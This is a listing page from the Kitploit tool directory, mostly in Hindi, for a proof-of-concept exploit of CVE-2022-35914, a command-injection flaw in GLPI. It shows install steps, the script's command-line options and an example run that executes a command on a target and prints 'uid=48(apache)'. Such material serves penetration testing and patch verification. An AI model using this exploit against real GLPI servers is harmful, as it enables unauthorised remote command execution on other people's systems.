Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-35914-poc — CVE-2022-35914 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो तीसरे पक्ष की लाइब्रेरी स्क्रिप्ट के माध्यम से GLPI में एक कमांड इंजेक्शन भेद्यता है। यह असुरक्षित GLPI इंस्टेंस पर मनमाना कमांड निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/cosad3s/cve-2022-35914-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubcosad3s/cve-2022-35914-poc

CVE-2022-35914-poc

CVE-2022-35914 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो तीसरे पक्ष की लाइब्रेरी स्क्रिप्ट के माध्यम से GLPI में एक कमांड इंजेक्शन भेद्यता है। यह असुरक्षित GLPI इंस्टेंस पर मनमाना कमांड निष्पादित करता है।

रिपॉजिटरी देखें
511112 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-35914 प्रमाण-अवधारणा

संदर्भ

  • https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr

उपयोग

root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
./CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL -c CMD [-f HOOK] [--check] [--user-agent USER_AGENT]

CVE-2022-35914 - GLPI - Command injection using a third-party library script

options:
  -h, --help            show this help message and exit
  -u URL                URL to test
  -c CMD                Command to launch
  -f HOOK               PHP hook function (default: exec)
  --check               Just check, no command execution.
  --user-agent USER_AGENT
                        Custom User-Agent

उदाहरण:

root@kitploit:~
❯ ./CVE-2022-35914.py -u http://glpi
[+] Command output (Return code: 0):
 uid=48(apache) gid=48(apache) groups=48(apache)
टूल डाउनलोड करें